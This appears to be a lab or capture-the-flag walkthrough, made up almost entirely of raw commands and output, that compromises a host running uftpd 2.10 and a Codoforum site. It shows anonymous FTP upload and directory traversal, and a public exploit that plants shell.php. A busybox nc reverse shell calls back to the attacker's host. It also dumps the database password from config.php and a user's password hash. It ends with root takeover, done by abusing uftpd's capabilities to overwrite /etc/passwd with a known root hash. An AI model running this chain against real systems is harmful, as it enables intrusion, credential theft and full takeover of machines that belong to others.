nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:46 EST
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 78.12% done; ETC: 12:48 (0:00:01 remaining)
Nmap scan report for 10.11.1.128
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
Bug in http-generator: no string output.
PORT     STATE SERVICE VERSION
21/tcp   open  ftp
|_ftp-bounce: bounce working!
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| fingerprint-strings: 
|   GenericLines, NULL, SMBProgNeg: 
|     220 uftpd (2.10) ready.
|   Help: 
|     220 uftpd (2.10) ready.
|     214-The following commands are recognized.
|     ABOR DELE USER PASS SYST TYPE PORT EPRT RETR MKD RMD REST MDTM PASV
|     EPSV QUIT LIST NLST MLST MLSD CLNT OPTS PWD STOR CWD CDUP SIZE NOOP
|     HELP FEAT
|     Help OK.
|   SSLSessionReq: 
|     220 uftpd (2.10) ready.
|     command '
|_    recognized by server.
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 e2:65:cc:f6:68:f0:48:c5:67:5d:64:b7:da:df:63:86 (RSA)
|   256 66:31:a1:2b:7e:4b:80:0b:35:01:52:5b:59:3a:40:56 (ECDSA)
|_  256 e2:8b:2f:8f:f9:10:28:93:a7:f5:3c:08:0d:fe:a0:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: All topics | Forum
|_http-server-header: Apache/2.4.54 (Debian)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
3306/tcp open  mysql   MySQL 5.5.5-10.5.15-MariaDB-0+deb11u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.15-MariaDB-0+deb11u1
|   Thread ID: 33
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, DontAllowDatabaseTableColumn, IgnoreSigpipes, ODBCClient, SupportsCompression, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, FoundRows, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \sNkP.3U3>|w`[)W\H2`
|_  Auth Plugin Name: mysql_native_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=2/9%Time=67A8EA20%P=x86_64-pc-linux-gnu%r(NU
SF:LL,19,"220\x20uftpd\x20\(2\.10\)\x20ready\.\r\n")%r(GenericLines,19,"22
SF:0\x20uftpd\x20\(2\.10\)\x20ready\.\r\n")%r(Help,EB,"220\x20uftpd\x20\(2
SF:\.10\)\x20ready\.\r\n214-The\x20following\x20commands\x20are\x20recogni
SF:zed\.\r\n\x20ABOR\x20DELE\x20USER\x20PASS\x20SYST\x20TYPE\x20PORT\x20EP
SF:RT\x20RETR\x20MKD\x20RMD\x20REST\x20MDTM\x20PASV\r\n\x20EPSV\x20QUIT\x2
SF:0LIST\x20NLST\x20MLST\x20MLSD\x20CLNT\x20OPTS\x20PWD\x20STOR\x20CWD\x20
SF:CDUP\x20SIZE\x20NOOP\r\n\x20HELP\x20FEAT\r\n214\x20Help\x20OK\.\r\n")%r
SF:(SSLSessionReq,45,"220\x20uftpd\x20\(2\.10\)\x20ready\.\r\n500\x20comma
SF:nd\x20'\x16\x03'\x20not\x20recognized\x20by\x20server\.\r\n")%r(SMBProg
SF:Neg,19,"220\x20uftpd\x20\(2\.10\)\x20ready\.\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/9%OT=21%CT=1%CU=41425%PV=Y%DS=2%DC=I%G=Y%TM=67A8E
OS:A62%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP
OS:=109%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M
OS:5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

21

21/tcp   open  ftp
|_ftp-bounce: bounce working!
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| fingerprint-strings: 
|   GenericLines, NULL, SMBProgNeg: 
|     220 uftpd (2.10) ready.
|   Help: 
|     220 uftpd (2.10) ready.
|     214-The following commands are recognized.
|     ABOR DELE USER PASS SYST TYPE PORT EPRT RETR MKD RMD REST MDTM PASV
|     EPSV QUIT LIST NLST MLST MLSD CLNT OPTS PWD STOR CWD CDUP SIZE NOOP
|     HELP FEAT
|     Help OK.
|   SSLSessionReq: 
|     220 uftpd (2.10) ready.
|     command '
|_    recognized by server.

ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||51191|)
125 Data connection already open; transfer starting.
226 Transfer complete.
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||58445|)
125 Data connection already open; transfer starting.
100% |**************************************************************************************************|     5       26.39 KiB/s    00:00 ETA
226 Transfer complete.
5 bytes sent in 00:00 (0.08 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||55867|)
125 Data connection already open; transfer starting.
-rw-r--r-- 1     0     0            5 Feb  9 12:49 test.txt
226 Transfer complete.

uftpd 2.10 - Directory Traversal (Authenticated)

ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../
229 Entering Extended Passive Mode (|||39519|)
125 Data connection already open; transfer starting.
drwxr-xr-x 1     0     0        28672 Dec  6 10:15 bin
drwxr-xr-x 1     0     0         4096 Dec  6 09:46 boot
drwxr-xr-x 1     0     0         3140 Feb  9 12:46 dev
drwxr-xr-x 1     0     0         4096 Jan 17 04:31 etc
drwxr-xr-x 1     0     0         4096 Dec  6 10:12 home
drwxr-xr-x 1     0     0         4096 Dec  6 10:15 lib
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 lib32
drwxr-xr-x 1     0     0         4096 Dec  6 09:40 lib64
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 libx32
drwx------ 1     0     0        16384 Dec  6 09:36 lost+found
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 media
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 mnt
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 opt
dr-xr-xr-x 1     0     0            0 Feb  9 12:46 proc
drwx------ 1     0     0         4096 Jan 17 04:37 root
drwxr-xr-x 1     0     0          540 Feb  9 12:46 run
drwxr-xr-x 1     0     0        12288 Dec  6 10:15 sbin
drwxr-xr-x 1     0     0         4096 Dec  6 10:12 srv
dr-xr-xr-x 1     0     0            0 Feb  9 12:46 sys
drwxrwxrwx 1     0     0         4096 Feb  9 13:19 tmp
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 usr
drwxr-xr-x 1     0     0         4096 Dec  6 09:43 var
-rw-r--r-- 1     0     0     29091206 Dec  6 09:46 initrd.img
-rw-r--r-- 1     0     0     28978277 Dec  6 09:39 initrd.img.old
-rw-r--r-- 1     0     0      6963648 Oct 21 16:24 vmlinuz
-rw-r--r-- 1     0     0      6962016 Sep  2 09:54 vmlinuz.old

80

80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: All topics | Forum
|_http-server-header: Apache/2.4.54 (Debian)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

wget https://raw.githubusercontent.com/Arinerron/uftpd_dirtrav/refs/heads/master/uftpd_dirtrav.py

uftpd 2.10 - Directory Traversal (Authenticated)

ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
229 Entering Extended Passive Mode (|||49435|)
125 Data connection already open; transfer starting.
drwxr-xr-x 1     0     0        28672 Dec  6 10:15 bin
drwxr-xr-x 1     0     0         4096 Dec  6 09:46 boot
drwxr-xr-x 1     0     0         3140 Feb  9 12:46 dev
drwxr-xr-x 1     0     0         4096 Jan 17 04:31 etc
drwxr-xr-x 1     0     0         4096 Dec  6 10:12 home
drwxr-xr-x 1     0     0         4096 Dec  6 10:15 lib
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 lib32
drwxr-xr-x 1     0     0         4096 Dec  6 09:40 lib64
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 libx32
drwx------ 1     0     0        16384 Dec  6 09:36 lost+found
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 media
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 mnt
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 opt
dr-xr-xr-x 1     0     0            0 Feb  9 12:46 proc
drwx------ 1     0     0         4096 Jan 17 04:37 root
drwxr-xr-x 1     0     0          540 Feb  9 12:46 run
drwxr-xr-x 1     0     0        12288 Dec  6 10:15 sbin
drwxr-xr-x 1     0     0         4096 Dec  6 10:12 srv
dr-xr-xr-x 1     0     0            0 Feb  9 12:46 sys
drwxrwxrwx 1     0     0         4096 Feb  9 17:16 tmp
drwxr-xr-x 1     0     0         4096 Dec  6 09:36 usr
drwxr-xr-x 1     0     0         4096 Dec  6 09:43 var
-rw-r--r-- 1     0     0     29091206 Dec  6 09:46 initrd.img
-rw-r--r-- 1     0     0     28978277 Dec  6 09:39 initrd.img.old
-rw-r--r-- 1     0     0      6963648 Oct 21 16:24 vmlinuz
-rw-r--r-- 1     0     0      6962016 Sep  2 09:54 vmlinuz.old
226 Transfer complete.

uftpd shell

https://github.com/Arinerron/uftpd_dirtrav/blob/master/uftpd_dirtrav.py

python3 uftpd_dirtrav.py  
 
[+] uftpd Directory Traversal (Chroot Bypass)
    Author: Aaron Esau (Arinerron)
    Writeup: https://aaronesau.com/blog/posts/6
 
[+] Connecting to 10.11.1.128:21...
[*] Banner: 220 uftpd (2.10) ready.
[+] The target appears to be running uftp version 2.10 which is vulnerable
[ ] Opened TCP server on 172.16.1.1:37467
[*] Found a directory with 8 files
[*] Found files with the extension .php, so this path is probably a webserver
[ ] STOP_ON_FIRST is enabled and a path was found, stopping...
[*] Uploading shell.php to /var/www/html/shell.php ...
[ ] Opened TCP server on 172.16.1.1:59861
[+] File uploaded to /var/www/html/shell.php
[+] Hooray, your file was found at http://10.11.1.128/shell.php ...have fun!
$ whoami
www-data

$ busybox nc 172.16.1.1 1234 -e bash

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.128] 55510
python3 -c 'import pty; pty.spawn("/bin/bash")'

priv esc

linpeas

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:25                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/wget
 
╔══════════╣ Installed Compilers
ii  gcc                           4:10.2.1-1                     amd64        GNU C compiler
ii  gcc-10                        10.2.1-6                       amd64        GNU C compiler

 
╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper

Files with capabilities (limited to 50):
/usr/local/sbin/uftpd =ep
/usr/bin/ping cap_net_raw=ep

www-data@forum:/var/www/html/sites/default$ cat config.php
cat config.php
<?php
 
/* 
 * @CODOLICENSE
 */
 
defined('IN_CODOF') or die();
 
$CF_installed=true;
 
function get_codo_db_conf() {
 
 
    $config = array (
  'driver' => 'mysql',
  'host' => 'localhost',
  'database' => 'codoforum',
  'username' => 'codoforum',
  'password' => '8F0rRUm37C0dO!',
  'prefix' => '',
  'charset' => 'utf8',
  'collation' => 'utf8_unicode_ci',

mysql

www-data@forum:/var/www/html/sites/default$ mysql -u codoforum -p''
mysql -u codoforum -p''
Enter password: 8F0rRUm37C0dO!

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| codoforum          |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [codoforum]> show tables;
show tables;
+-------------------------+
| Tables_in_codoforum     |
+-------------------------+
| b8_wordlist             |
| codo_attachments        |
| codo_badges             |
| codo_bans               |
| codo_block_roles        |
| codo_blocks             |
| codo_categories         |
| codo_config             |
| codo_crons              |
| codo_daily_rep_log      |
| codo_edits              |
| codo_fields             |
| codo_fields_roles       |
| codo_fields_values      |
| codo_import_data        |
| codo_logs               |
| codo_mail_queue         |
| codo_notify             |
| codo_notify_queue       |
| codo_notify_subscribers |
| codo_notify_text        |
| codo_page_roles         |
| codo_pages              |
| codo_permission_list    |
| codo_permissions        |
| codo_plugins            |
| codo_poll_log           |
| codo_poll_options       |
| codo_poll_questions     |
| codo_posts              |
| codo_promotion_rules    |
| codo_report_types       |
| codo_reports            |
| codo_reputation         |
| codo_roles              |
| codo_sessions           |
| codo_signups            |
| codo_smileys            |
| codo_tags               |
| codo_tags_allowed       |
| codo_topics             |
| codo_unread_categories  |
| codo_unread_topics      |
| codo_user_badges        |
| codo_user_preferences   |
| codo_user_roles         |
| codo_users              |
| codo_views              |
+-------------------------+
48 rows in set (0.001 sec)

MariaDB [codoforum]> select * from codo_users;
select * from codo_users;
+----+------------+------------+--------------------------------------------------------------+-------+-----------------------+------------+-------------+-----------+-------------+-------------------+-----------+----------+---------------+----------+------------+-----------------------------+
| id | username   | name       | pass                                                         | token | mail                  | created    | last_access | read_time | user_status | avatar            | signature | no_posts | profile_views | oauth_id | reputation | last_notification_view_time |
+----+------------+------------+--------------------------------------------------------------+-------+-----------------------+------------+-------------+-----------+-------------+-------------------+-----------+----------+---------------+----------+------------+-----------------------------+
|  1 | forumadmin | forumadmin | $2a$08$5yBXNQQh0kGOzav3RM4iAeCBVJ.yG6HRHn1rs4BBD4SLtfYjVqb5K | NULL  | forum@localhost.local | 1670338579 |  1670400752 |         0 |           1 | F_ffee00.png      | NULL      |        1 |             6 | 0        |          0 |

$2a$08$5yBXNQQh0kGOzav3RM4iAeCBVJ.yG6HRHn1rs4BBD4SLtfYjVqb5K

capabilities (uftpd)

Files with capabilities (limited to 50):
/usr/local/sbin/uftpd =ep
/usr/bin/ping cap_net_raw=ep

capability own by root

$ ls -al /usr/local/sbin/uftpd
-rwxr-xr-x 1 root root 223560 Dec  6  2022 /usr/local/sbin/uftpd

www-data@forum:/etc$ echo 'test' > test2.txt
echo 'test' > test2.txt
bash: test2.txt: Permission denied

/usr/local/sbin/uftpd -n -o ftp=2123 -o writable /etc/

ftp> put test.txt 
 
ftp> ls
229 Entering Extended Passive Mode (|||43387|)
125 Data connection already open; transfer starting.
...
...
-rw-r--r-- 1     0     0            5 Feb 10 00:33 test.txt
-rw-r--r-- 1     0     0           17 Dec  6 09:41 timezone
-rw-r--r-- 1     0     0         1260 Jun 16 01:37 ucf.conf
-rw-r--r-- 1     0     0         4942 Nov 23 09:34 wgetrc
-rw-r--r-- 1     0     0          642 Dec 24 09:58 xattr.conf

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin

openssl passwd 'root'
$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1

root:$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin

ftp 10.11.1.128 2123
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
Name (10.11.1.128:forum): 
331 Login OK, please enter password.
Password: 
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||38111|)
125 Data connection already open; transfer starting.
100% |**************************************************************************************************|  1575       21.15 MiB/s    00:00 ETA
226 Transfer complete.
1575 bytes sent in 00:00 (21.93 KiB/s)

changed root password by modifying /etc/passwd

$ cat /etc/passwd
root:$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin

www-data@forum:/etc$ su root
su root
Password: root
 
root@forum:/etc# whoami
whoami
root
root@forum:/etc# cd /root
cd /root
root@forum:~# cat key.txt
cat key.txt
bhjky7fg3ndsk27hf9mi
root@forum:~# date
date
Mon 10 Feb 2025 12:45:38 AM EST

VHL — Forum

nmap

21

anonymous login and upload

uftpd 2.10 - Directory Traversal (Authenticated)

80

uftpd 2.10 - Directory Traversal (Authenticated)

uftpd shell

priv esc

linpeas

mysql

capabilities (uftpd)